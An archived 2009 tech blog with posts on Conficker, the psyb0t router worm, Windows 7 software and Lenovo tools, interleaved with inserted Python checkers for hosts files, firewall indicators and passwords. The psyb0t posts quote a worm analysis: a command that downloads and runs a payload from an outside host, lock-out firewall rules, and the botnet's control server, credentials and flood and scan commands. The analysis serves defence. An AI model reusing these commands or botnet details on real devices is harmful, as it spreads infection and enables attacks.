
Monday, March 30, 2009

Conficker - April Fools on who?

Well, everyone is talking about it. And it seems something BIG will happen on April 1st. I doubt it, but with an infected population of a million, you never know.

BTW, at the very least, try visiting sites such as www.f-secure.com or www.symantec.com. If they do not load, you may be infected, or something has done serious damage to your hosts file.
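The hosts-file check above, as an added example that is not part of the original post: it parses hosts-file text and flags any static mapping for the security-vendor domains the post names. The domain list, the sample file contents and the helper names (parse_hosts, find_hijacked) are assumptions made for this example.

```python
# Added example (not from the original post): flag hosts-file entries that
# pin security-vendor domains, the tampering the post suggests when
# www.f-secure.com or www.symantec.com stops loading.
import ipaddress

# Domains to watch; this list is an assumption for the example, extend it as needed.
WATCHED_DOMAINS = {"www.f-secure.com", "f-secure.com", "www.symantec.com", "symantec.com"}


def parse_hosts(text):
    """Return (ip, hostname) pairs from hosts-file text, ignoring comments and junk."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop trailing comments
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue                            # an address with no names
        ip, names = parts[0], parts[1:]
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            continue                            # malformed address, skip the line
        for name in names:
            entries.append((ip, name.lower()))
    return entries


def find_hijacked(text, watched=WATCHED_DOMAINS):
    """Return the watched domains that the hosts file maps to any address.

    A legitimate hosts file has no reason to name these domains at all, so any
    static mapping for them (loopback, a bogus address, anything) is suspicious.
    """
    return sorted({name for _ip, name in parse_hosts(text) if name in watched})


# Constructed sample, not a real hosts file.
SAMPLE_HOSTS = """\
# constructed sample
127.0.0.1       localhost
::1             localhost
127.0.0.1       www.f-secure.com   # vendor site sent to loopback
10.0.0.5        www.symantec.com
192.168.1.20    fileserver.lan
not-an-address  www.example.invalid
"""

if __name__ == "__main__":
    # On Windows the live file is %SystemRoot%\System32\drivers\etc\hosts,
    # on Linux /etc/hosts; read it and pass the text to find_hijacked().
    for name in find_hijacked(SAMPLE_HOSTS):
        print("suspicious hosts entry for", name)
```

Only the hosts file is covered here; a DNS-level redirect or a blocked connection would pass this check, so a clean result does not rule out an infection.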

Here is a good FAQ on the Conficker worm:


Friday, March 27, 2009

psyb0t - Am I vulnerable?

Just got some info that you will be vulnerable to this worm if:
  • Your device is mipsel (MIPS running in little-endian mode, which is what the worm is compiled for).
  • Your device also has telnet, SSH or web-based interfaces available to the WAN, and
  • Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable.
For point 1, it's not hard to change; a psyb0t v2 can probably fix that. So do not count on being SAFE just because you do not satisfy point 1.

Also, it was suggested that if you find ports 80, 23 and 22 are blocked, you should suspect something is going on. Well, unless your ISP already blocks them, in which case it's a bit hard to confirm. Come on, which ISP would block port 80?? :P

I copied the infection steps here for those who are more technical:

Infection strategy

Get a shell on the vulnerable device (methods vary). Once a shell is acquired, the bot does the following things:

# rm -f /var/tmp/udhcpc.env
# wget

If wget is present, then it uses wget to download hxxp://dweb.webhop.net/.bb/udhcpc.env , and runs it in the background.

If wget is not present, the bot looks for "busybox ftpget", and then tries falling back to a tftp client. Once it is downloaded, it launches it in the background. The following snippet is the variant it uses if it finds that wget is usable.

# wget hxxp://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp && chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &
udhcpc.env 100% |*****************************| 33744 00:00 ETA

It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports.

# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP

This concludes the infection process.
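A check for the post-infection indicators listed above, as an added example that is not part of the original post or the DroneBL write-up: it parses `iptables -S INPUT` / `iptables-save` style rules for the DROP rules on ports 22, 23 and 80, looks for the /var/tmp/udhcpc.env dropper path in a file listing, and combines both into a verdict. The rule text and file list are constructed samples, and the function names (blocked_management_ports, dropper_present, assess) are assumptions for this example.

```python
# Added example (not from the original post): look for the indicators the
# write-up describes after infection - the dropper left in /var/tmp and the
# iptables rules that lock the owner out of telnet, ssh and the web UI.
import re

MANAGEMENT_PORTS = {22: "ssh", 23: "telnet", 80: "http"}
DROPPER_PATH = "/var/tmp/udhcpc.env"   # path quoted in the infection steps

# Matches "-A INPUT ... -p tcp ... --dport 23 ... -j DROP" (iptables -S / iptables-save form).
RULE_RE = re.compile(
    r"-A\s+INPUT\b.*?-p\s+(?P<proto>\w+)\b.*?--dport\s+(?P<port>\d+)\b.*?-j\s+(?P<target>\w+)"
)


def blocked_management_ports(iptables_text):
    """Return {port: service} for INPUT rules that DROP/REJECT tcp to ssh/telnet/http."""
    blocked = {}
    for line in iptables_text.splitlines():
        m = RULE_RE.search(line.strip())
        if not m:
            continue
        port = int(m.group("port"))
        if (m.group("proto") == "tcp"
                and m.group("target") in {"DROP", "REJECT"}
                and port in MANAGEMENT_PORTS):
            blocked[port] = MANAGEMENT_PORTS[port]
    return blocked


def dropper_present(file_listing):
    """True if the dropper path appears in a list of file paths (e.g. from `ls /var/tmp/*`)."""
    return any(path.strip() == DROPPER_PATH for path in file_listing)


def assess(iptables_text, file_listing):
    """'infected' when the dropper and all three lock-out rules are present,
    'suspicious' when only some indicators are seen (an admin may legitimately
    drop these ports on WAN), 'clean' otherwise."""
    blocked = blocked_management_ports(iptables_text)
    dropper = dropper_present(file_listing)
    if dropper and len(blocked) == len(MANAGEMENT_PORTS):
        return "infected"
    if dropper or blocked:
        return "suspicious"
    return "clean"


# Constructed sample of `iptables -S INPUT` on an infected router: the three
# rules from the write-up plus unrelated rules that must not trigger.
SAMPLE_RULES = """\
-P INPUT ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -p tcp -m tcp --dport 23 -j DROP
-A INPUT -p tcp -m tcp --dport 22 -j DROP
-A INPUT -p tcp -m tcp --dport 80 -j DROP
-A INPUT -p udp --dport 53 -j DROP
"""
# Constructed sample listing of /var/tmp.
SAMPLE_FILES = ["/var/tmp/udhcpc.env", "/var/tmp/dhcp.leases"]

if __name__ == "__main__":
    print("blocked:", blocked_management_ports(SAMPLE_RULES))
    print("verdict:", assess(SAMPLE_RULES, SAMPLE_FILES))
```

The DROP rules alone are only "suspicious" because, as the post notes, an ISP or a careful owner may already be blocking those ports; the dropper path is the stronger indicator, and a router that cannot be reached on any management port at all should be checked from a serial console or reflashed from a known-good image.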

And more interestingly, these are the IRC bot details and commands:

IRC Botnet

Command and control server: strcpy.us.to
IP: 207.155.1.5 (master controller, Windstream Communications AS16687)
IP: 202.67.218.33 (backup controller? HKnet/REACH AS?????)
Port: 5050
Password: $!0@
Channel: #mipsel
Key: %#8b
NickPattern: \[NIP\]-[A-Z/0-9]{9}
BotController: DRS
DroneURL: hxxp://nenolod.net/~nenolod/psyb0t/udhcpc.env (backup copy, i did not write it)

strcpy.us.to control domain nameservers: ns1.afraid.org, ns2.afraid.org, ns3.afraid.org, ns4.afraid.org [suspended]

IRC Commands

.mode - sets a mode on a channel
.login - login to the bot
.logout - logout
.exit - causes the botnet to exit and remove itself
.sh - runs on shell
.tlist - lists all threads
.kill - kills a thread
.killall - kills threads by glob-match pattern
.silent - makes the bot stop sending to channel
.getip - show bot WAN ip address
.visit - flood URL with GET requests
.scan - scans a random range for vulnerable routers/modems
.rscan - scans a CIDR range for vulnerable routers/modems
.lscan - scans the local subnet for vulnerable routers/modems
.lrscan - scans a range in the local subnet for vulnerable routers/modems
.split - splits the workload of a scan thread into two threads
.sql - scans for vulnerable MySQL servers and attempts to make them download and run URL
.pma - scans for vulnerable phpMyAdmin and attempts to make them download and run URL
.sleep - makes the bot sleep for the given time
.sel - ???
.esel - skip next part if locale is not X
.vsel - skip next part if version is not X
.gsel - ???
.rejoin [delay] - cycle the channel after delay
.upgrade - download new bot from the distribution site
.ver - returns "[PRIVATE] PSYB0T" followed by version
.rs - returns detected rapidshare URLs and logins
.rsgen - generate a bogus rapidshare login page and force user to browse to it
.rsloop - runs a webserver i/o loop as a thread
.wget - runs wget with the provided url
.r00t - attempts to raise effective UID using vmsplice() exploit (seems pointless)
.sflood - sends SYN packets to IP
.uflood - sends UDP packets to IP
.iflood - sends ICMP pings to IP
.pscan - portscans IP
.fscan - tries to bruteforce FTP server at IP
More info at:
http://www.dronebl.org/blog/8

psyb0t Worm Hacking Home Router

What is psyb0t? It's the stealthy botnet worm that has been in the wild hacking routers all over the world. Well, at least on planet Earth. Here are some of the "confirmed" characteristics of the worm:
  • is the first botnet worm to target routers and DSL modems
  • contains shellcode for many mipsel devices
  • is not targeting PCs or servers
  • uses multiple strategies for exploitation, including bruteforce username and password combinations
  • harvests usernames and passwords through deep packet inspection
  • can scan for exploitable phpMyAdmin and MySQL servers
It sounds to me like OpenWRT/DD-WRT boxes are sitting ducks for this. Anyone whose router can be flashed with these firmwares should probably take care about this worm. I heard even Tomato is affected.

While I do not have a sample of the worm right now, all I can advise is:

Change the admin account name to something else, like littleteddybear66.
Change the password (I hope you are not using the default!!!) to something strong. I would call 10 characters, upper + lower + symbol + number, strong.
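The two pieces of advice above as a checker, added here as an example that is not part of the original post: it implements the post's own strength rule (10 characters with upper case, lower case, a digit and a symbol) and additionally rejects factory-default account names and a password equal to the account name. The default-name list and the function names (password_weaknesses, credential_weaknesses, is_strong) are assumptions for this example.

```python
# Added example (not from the original post): check router credentials against
# the advice above - a non-default account name and a password of at least
# 10 characters mixing upper case, lower case, digits and symbols.
import string

MIN_LENGTH = 10
# Account names that commonly ship as factory defaults; an assumption for this example.
DEFAULT_ADMIN_NAMES = {"admin", "administrator", "root", "user"}


def password_weaknesses(password):
    """Return the reasons a password misses the post's policy (empty list if it passes)."""
    reasons = []
    if len(password) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")
    if not any(c.isupper() for c in password):
        reasons.append("no upper-case letter")
    if not any(c.islower() for c in password):
        reasons.append("no lower-case letter")
    if not any(c.isdigit() for c in password):
        reasons.append("no digit")
    if not any(c in string.punctuation for c in password):
        reasons.append("no symbol")
    return reasons


def credential_weaknesses(username, password):
    """Combine the account-name advice with the password policy."""
    reasons = []
    if username.strip().lower() in DEFAULT_ADMIN_NAMES:
        reasons.append("account name is a factory default")
    if password.lower() == username.lower():
        reasons.append("password equals the account name")
    return reasons + password_weaknesses(password)


def is_strong(username, password):
    """True when neither the account name nor the password raises a reason."""
    return not credential_weaknesses(username, password)


if __name__ == "__main__":
    # Constructed sample credentials; the second pair is the post's suggested style.
    for user, pw in [("admin", "admin"), ("littleteddybear66", "Tr0ub4dor&3x!")]:
        print(user, "->", credential_weaknesses(user, pw) or "ok")
```

Character-class rules catch the factory defaults and the short passwords the worm brute-forces, but not dictionary words dressed up with a capital and a digit, so treat a pass here as the minimum, not as proof of a good password.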

Friday, March 20, 2009

Pwn2Own hacker interview

Some background. At the CanSecWest conference a few days back, the hacker Charlie Miller managed to break into OS X within a few seconds with an exploit against Safari. ZDNet ran a short interview with him at:

http://c.moreover.com/click/here.pl?r1877738091

The key point I wanted to post here is that he mentioned Windows was much harder to break, which I agree with. However, that is true only when the software actually enforces the security measures. I probably have to agree with his point that on Apple, you can just do anything you want. Well, that is true as well. However, one point kept me thinking: NO MORE FREE BUGS. Each bug found can be worth USD$5000 or more, depending on the difficulty of the software. So I suppose I should not release my 0-days anymore, since I would be like Santa Claus giving away $5k (or more) each time I do that. Haha, well, it depends on how bad the bugs are and my level of good vs evil. In case of doubt, read my previous post on How Evil Am I.

Enjoy reading the interview. And btw, IE8 went ahead with the official launch despite the 0-day bug being present.

How Evil am I? Bawahahahahaha


How evil are you?

I guess it's a fun quiz, just don't be offended, Canadians. Not every country IS a weapon.

Tuesday, March 17, 2009

Lenovo ThinkVantage System Update


I mentioned this piece of software in a previous post, and I believe it deserves to be mentioned again in a post of its own. I must say that among all the laptop / PC vendors I have seen, such as Acer, HP, Dell, Gateway etc., none of them has a tool like ThinkVantage System Update.

So what exactly is ThinkVantage System Update? Think of it as the Lenovo (previously IBM) ThinkPad live update system, similar to Windows Update or your anti-something update. It picks up the exact model of your laptop or PC and then finds the updates you may require. So you won't end up picking the wrong drivers for hardware you do not have. This is quite common with other vendors, especially if they ship many models of Bluetooth adapter or DVD writer within the same range. You have to dig pretty hard and remember which one you have when you choose which driver to download. This, however, is not the case with Lenovo because of ThinkVantage System Update.

This is the descriptions provided on Lenovo's page:
"System Update™ helps you reduce the time, effort, and expense required to support and maintain the latest drivers, BIOS, and other applications for Think or Lenovo systems. It enables you to get the latest updates from the Lenovo support site, or to automatically schedule your system to be updated."

I would love to repeat other stuff from that page, but I think it's probably better you take a look yourself if you are using a Lenovo system. However, I find the following information at least is useful to state here:

Supported systems
  • Lenovo 3000 C100, C200, N100, N200, V100, V200 notebook computers
  • Lenovo 3000 J100, J105, J110, J115, J200, J200p, J205, S200, S200p, S205 desktop computers
  • ThinkPad Reserve Edition
  • ThinkPad A30, A30p, A31, A31p
  • ThinkPad G40, G41, G50
  • ThinkPad R30, R31, R32, R40, R40e, R50, R50e, R50p, R51, R51e, R52, R60, R60e, R60i, R61, R61e, R61i
  • ThinkPad S31
  • ThinkPad T23, T30, T40, T40p, T41, T41p, T42, T42p, T43, T43p, T60, T60p, T61, T61p
  • ThinkPad X22, X23, X24, X30, X31, X32, X40, X41, X41 Tablet, X60, X60s, X60 Tablet, X61, X61s, X61 Tablet, X300
  • ThinkPad Z60m, Z60s, Z60t, Z61e, Z61m, Z61p, Z61t
  • ThinkPad SL300, SL400, SL500
  • ThinkPad T400, T500
  • All ThinkCentre desktop computers
  • All ThinkStation desktop computers

I find it strange that by default System Update is not installed on the ThinkPad I got. OK, there may also be a chance it was removed by "smart" administrators to prevent us from updating the laptops. But in any case, here is the link to read about it and download it:

Lastly, I think it's fair to say I am supportive of this software and really wish other vendors had something like this. However, I also state that I do not work for IBM or Lenovo and am in no way associated with this software.

Monday, March 16, 2009

Lenovo Thinkpad Bluetooth with other devices

I was having a terribly hard time trying to send a file from my Omnia to my ThinkPad today. I deleted the pairing, re-paired and did whatever it took. It just doesn't work.

I had used ThinkVantage and apparently there is no update to the Bluetooth software at all. I checked the drivers. They say 2004. I wondered why.

After some checking, it turns out that the default Windows Bluetooth drivers were in use (2004 is when WinXP was released). So, I searched around online to try to grab hold of a copy of the driver. It turns out that this Broadcom Bluetooth "Lenovo Bluetooth with Enhanced Data Rate" is the same as the Toshiba one. I concluded that from the installation program anyway; it looks exactly the same. In any case, I found the site to check the latest version available from here:

And the driver I got to install was the latest, 5.5.0.5800, at:

I hope this information will be useful to people using these ThinkPad models:
- ThinkPad R60(*1), R60e(*1), R61(*1), R61e(*1), R61i(*1)
- ThinkPad R400, R500
- ThinkPad SL300, SL400, SL500
- ThinkPad T60(*1), T60p(*1), T61(*1), T61p(*1)
- ThinkPad T400, T500
- ThinkPad W500, W700, W700ds
- ThinkPad X60(*1), X60s(*1), X60 Tablet(*1), X61(*1), X61s(*1), X61 Tablet(*1)
- ThinkPad X200, X200s, X200 Tablet, X300(*1), X301
- ThinkPad Z60m(*1), Z60t(*1)
- ThinkPad Z61e(*1), Z61m(*1), Z61p(*1), Z61t(*1)


Wednesday, March 11, 2009

Roboform and IE8

During the testing of Windows 7, I noticed that the password manager I was using worked perfectly. This is Roboform.

More information:
http://www.roboform.com/features.html

Honestly, there are simply too many passwords to remember these days, and changing all of them to a few similar ones is highly not recommended either. Therefore the use of a password manager is one way to go about keeping track of your thousands of passwords.

Roboform offers both a free and a pro mode. There is a limit to the number of passwords you can store in the free mode. However, once started, I find it hard to pull away from this. In fact I rely on it so much for many of my complex passwords. Roboform also offers a runtime-only portable version for U3, USB portable application, PortableApps, Windows Mobile etc. This makes the password database portable across my many devices. Oh, and of course the passwords are stored encrypted as well.

Roboform has been tested working in both IE8 and Windows 7.

Sunday, March 08, 2009

Windows 7 RC Build 7048

There are already some torrent sites listing this leaked version of the RC of Windows 7. I am not sure how that will work, especially when it comes to the CD-key management. However, rest assured that there is indeed a Build 7048 RC which will be coming soon (although it was promised for late Feb 2009).

In the meantime, enjoy these 100 screenshots from Softpedia of the RC1 of Windows 7:
http://news.softpedia.com/news/Windows-7-Build-7048-100-Screenshots-Gallery-106289.shtml

Virtual Drive Software for Windows 7

I used to be a great fan of Alcohol 52% and Daemon Tools. However, I just realized that due to the SPTD driver (http://www.duplexsecure.com/downloads), it will not install properly in Windows 7. Well, to be fair, it kind of installed, but Windows 7 could never detect that it was installed. As a result, Alcohol 52% keeps trying to install it and does not go on...

There may be other tools that work, but I am going to recommend using Gizmo Drive for now:
http://arainia.com/software/gizmo/overview.php?nID=4

Gizmo Drive does something similar. It can make and mount images in the more popular formats. Unfortunately, it does not have the copy-protection features of Alcohol and Daemon Tools.

Until either of these fixes the Windows 7 problem, I guess we can use Gizmo Drive for now. BTW, it's freeware too.

Toshiba Memory Flash Drive Cannot enable Vista Readyboost

I am sorry I have to mention Toshiba. It can probably happen to any other brand, but so far I have only seen it happen with Toshiba ones.

Before I go on, let's put this straight. If the packaging says it's Vista ReadyBoost compatible, it should be. Otherwise, no matter what you do, it will probably not be. Notice I said probably, because I had a red SanDisk flash drive which actually IS compatible but is not advertised as such.

The only problem arises when you actually plug in the flash drive and find that Vista complains it does not meet the minimum requirement. BTW, as I had mentioned before, the requirement is only 2MB/second.

I was very upset when I got the Toshiba drive and found that I had been ripped off. The biggest problem was that I bought the 4GB drive solely for the purpose of ReadyBoost. 4GB is the max you can use on Windows Vista, but do note that in Windows 7 this limit has been removed. Next, when I attempted to RMA the item, Toshiba told me that it was from an "unauthorized" dealer and advised me to go back to the shop I bought it from, which turned out to be Playcraft. They are only located in the far west, which would probably cost me more than this flash drive to get to.

So, I had to take the matter into my own hands. I was so frustrated I thought I might as well "destroy" the drive by overwriting it with zeros or something similar using a DOS hard disk wiper tool. And that I did. There are many you can use; I used Acronis in this case. What I did not do was create the partition back.

I booted back into Windows Vista and it detected the unformatted drive. I simply created a "simple volume" and remounted the drive with a drive letter. Suddenly and "automagically", the ReadyBoost prompt popped up saying it is ready to be used with ReadyBoost.

Unbelievable? I think so too. And I really wonder what they did in the first place that made the drive NOT ReadyBoost compatible. Maybe I should have checked the drive before I did the HDD wipe on it... In any case, I hope this helps you out there solve similar problems.

Friday, March 06, 2009

Jeyo Mobile Extender and Windows 7 (Firewall)

Jeyo Mobile Extender allows you to sync and send SMS as if they were email, using Outlook. In fact, it's a good SMS backup tool as well for your PDA / Windows Mobile device.

More info:
http://www.jeyo.com/extender.asp

However, there seems to be a problem detecting the mobile device in Windows 7. I did some checking and eventually found out that it was due to a firewall issue in Windows 7. So, this probably only affects people who are using the Windows 7 default firewall. However, if you do encounter such an issue, you can try this out on your 3rd-party firewall as well.

Taken from:
http://www.everythingq.com/forum/software/jeyo-mobile-extender-windows-7-cannot-connect-30819.html

Overview:
Add an Inbound Rule in Windows Firewall for outlook.exe, protocol TCP and port 9035.

Details:
Open Control Panel
Open Windows Firewall
Click Advanced Settings
Select Inbound Rules

From the Menu, select New Rule
Rule Type -> Custom
Program -> %Program Files% (x86)\Microsoft Office\Office 12\OUTLOOK.EXE (or wherever your Outlook.exe is)
Protocol and Ports -> Protocol type: TCP, Local Port -> Specific Port: 9035
Scope: Which remote IP addresses does this rule apply to? These IP addresses -> Predefined set of computers -> Local subnet
Action: Allow the connection
Profile: Uncheck Domain and Public
Name: Jeyo Mobile Extender

Wednesday, March 04, 2009

Doomsday: How 4C temperature rise this century will change world beyond recognition and threaten human survival

By Claire Bates
Last updated at 3:21 PM on 26th February 2009


Alligators bask off the English coast, the Saharan desert stretches far into Europe and just 10 per cent of humans are left on the planet.

Science fiction?

No, this is the doomsday scenario being predicted by scientists if global temperatures make a predicted rise of 4C in the next 100 years. Some fear it could happen as early as 2050.

Rivers from the Danube to the Rhine would be reduced to a trickle while melting glaciers and storm surges would drown coastal regions under two metres of water. More if parts of Antarctica were to melt.


Trying to prevent desertification. Some experts predict that by 2100 deserts would take over most of Africa and stretch into Europe

While 4C does not sound like very much, the New Scientist magazine, has said it could easily occur.

A report in 2007 by the Intergovernmental Panel on Climate Change, whose conclusions are generally accepted as conservative, predicted a rise of between 2C and 6.4C this century.

In August of 2008 Bob Watson, former chair of the IPCC, warned that the world should prepare for 4C of warming.

As part of their research into the article the New Scientist spoke to leading climate experts from around the world to create a map of how our world might look 4C warmer.

Many were optimistic that humans would survive but would have to adapt to vastly altered circumstances. Vast numbers would have to migrate and there would have to be a world effort to redistribute resources.

As a huge swathe of desert started to spread out from the equator, humans would migrate north and south towards the poles, knocking down national boundaries.

'We need to look at the world afresh and see it in terms of where the resources are, and then plan population around that,' Peter Cox from the University of Exeter said.

Humans will become mostly vegetarian with most animals being eaten to extinction by desperate people.


As glaciers melt, sea levels are expected to rise by 2m this century

Large chunks of Earth's biodiversity would vanish because they could not adapt in such a short time.

In the world's oceans, numbers of fish would drop dramatically as acid levels rose because of decreasing plankton.

As the remaining fertile lands would be so precious people would have to live in compact high-rise cities to preserve space for food growing.

Scientists have put forward the prospect of energy being supplied for homes by a giant solar belt running across North Africa, the Middle East and the southern U.S. The New Scientist article also questioned the future of humankind.

'I think they'll survive as a species all right, but the cull during this century is going to be huge,' former Nasa scientist James Lovelock said.

'The number remaining at the end of the century will probably be a billion or less.'


Workers install solar panels in France. Massive solar panel complexes stretching across countries could be built to provide for the world's energy needs

The last time the world experienced such temperature rises was 55 million years ago when large areas of frozen methane were released from the ocean and filled the atmosphere with carbon, warming the planet by 6C.

Unfortunately humans did not learn any survival lessons from the event as we only evolved a quarter of a million years ago.

Many experts hope our species will continue but warn we are not doing enough to try and prevent a catastrophe.

'In order to be safe, we would have to reduce our carbon emissions by 70 per cent by 2015. We are currently putting in 3 per cent more each year,' said Nobel prizewinning chemist Paul Crutzen.

Source:
http://www.dailymail.co.uk/sciencetech/article-1156023/Doomsday-How-4C-temperature-rise-century-change-world-recognition-threaten-human-survival.html

Monday, March 02, 2009

A moment of Zen

I am not sure if you have ever encountered something like this...

It was a warm and windy afternoon. Well, it's windy because I am stuck somewhere in the forest near the sea. I was so tired (from the waiting) that I simply lay down on the dirt track. Well, it's at the point where you do not really care anymore because you are so tired.

Above me, I see some leaves, green and yellow. The sunlight shines through, and the breeze from the sea makes the leaves dance in the wind. It's moments like this that do not come often. All around me I can hear the leaves hiss and some bugs humming... It's that type of lazy afternoon, basically.

All of a sudden, I felt this moment of, well, Zen maybe. I feel nothing matters. I forget everything around me. It was as if I am now one with heaven and earth. Inside, I feel tranquil and at peace. It was like time just froze.

But time did pass, and all I am sure of is that I was not asleep or anything. Suddenly, I feel a groan from my stomach. :) It's lunch time. Well, I had to go and collect the food for the guys....

It's not that often you get to be with nature in this way. Without boundary or restriction. Just lying there and feeling yourself submerged into nature itself. Well, try it someday and see if you can feel this wonderful moment of Zen...


Copyright © 2008 nemesisv.blogspot.com, All rights reserved.